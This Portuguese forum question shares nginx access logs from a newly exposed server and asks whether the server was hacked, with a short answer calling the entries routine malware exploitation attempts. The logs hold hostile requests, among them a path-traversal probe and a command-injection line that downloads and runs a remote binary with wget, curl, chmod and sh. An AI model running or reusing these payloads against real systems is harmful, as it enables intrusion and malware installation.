Domínio de encaminhamento automático Nginx que eu não configuro

tag-icon tag-icon nginx
Domínio de encaminhamento automático Nginx que eu não configuro

Configurei um novo servidor na DigitalOcean. Esqueci de ativar o firewall por um dia, então verifico o log do nginx e vejo estas linhas:

120.216.207.173 - - [11/Dec/2019:01:42:29 +0000] "GET http://ah.sina.com.cn/ HTTP/1.1" 200 612 "http://ah.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE
 9.0; Windows NT 6.1; Trident/5.0)"
185.53.88.5 - - [11/Dec/2019:02:07:44 +0000] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.1" 400 37 "-" "python-requests/2.6.0 C
Python/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64"
94.102.49.104 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"
120.216.207.173 - - [11/Dec/2019:02:52:07 +0000] "GET http://www.jaycn.com/ HTTP/1.1" 200 612 "http://www.jaycn.com/" "Mozilla/5.0 (compatible; MSIE 9
.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:15 +0000] "GET http://www.enet.com.cn/ HTTP/1.1" 200 612 "http://www.enet.com.cn/" "Mozilla/5.0 (compatible; MS
IE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:19 +0000] "GET http://www.rising.cn/ HTTP/1.1" 200 612 "http://www.rising.cn/" "Mozilla/5.0 (compatible; MSIE 9
.0; Windows NT 6.1; Trident/5.0)"
208.97.139.112 - - [11/Dec/2019:02:52:46 +0000] "POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/ric
hard; chmod +x richard; sh richard HTTP/1.0" 404 169 "-" "-"
120.216.207.173 - - [11/Dec/2019:03:27:29 +0000] "GET http://www.xinhuanet.com/ HTTP/1.1" 200 612 "http://www.xinhuanet.com/" "Mozilla/5.0 (compatible
; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:33 +0000] "GET http://blog.sina.com.cn/ HTTP/1.1" 200 612 "http://blog.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:36 +0000] "GET http://www.guokr.com/ HTTP/1.1" 200 612 "http://www.guokr.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:41 +0000] "GET http://www.ecitic.com/ HTTP/1.1" 200 612 "http://www.ecitic.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

Gostaria de saber como meu nginx pode retornar o domínio que não está configurado? Isso significa que o nginx foi hackeado?

Responder1

São apenas tentativas de exploração de malware, o que é comum e normal.

O endereço IP indica que é este malwarehttps://twitter.com/carbreal/status/1205059129619947520/photo/3

informação relacionada